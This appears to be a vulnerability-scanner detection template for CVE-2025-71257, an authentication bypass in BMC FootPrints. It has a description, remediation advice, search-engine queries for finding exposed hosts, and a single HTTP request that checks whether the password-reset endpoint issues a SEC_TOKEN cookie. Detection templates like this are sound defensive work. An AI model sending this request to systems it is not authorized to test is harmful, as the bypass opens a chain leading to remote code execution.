id: CVE-2025-71257 info: name: BMC FootPrints - Authentication Bypass author: watchTowr,DhiyaneshDk severity: medium description: | BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE). impact: | Unauthenticated attackers can bypass access controls to access and modify application data and system resources. remediation: | Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-71257 epss-score: 0.12542 epss-percentile: 0.94066 cwe-id: CWE-287 reference: - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/ - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/ metadata: verified: true max-request: 1 shodan-query: html:"/footprints/servicedesk/" product: footprints vendor: bmc fofa-query: body="/footprints/servicedesk/" tags: cve,cve2025,servicedesk,bmc-software,auth-bypass,footprints,bmc,vkev variables: string: "{{to_lower(rand_base(8))}}" http: - raw: - | GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: set_cookie words: - "SEC_TOKEN=" # digest: 4a0a00473045022100b689607be9965dc232cbeb811da2dfbb68d610f28bfde1bb10cf88a05a215120022004facef1f37d5a3b879835f308a11049821cd2f206a64199a28640ff8394b1d4:922c64590222798bb761d5b6d8e72950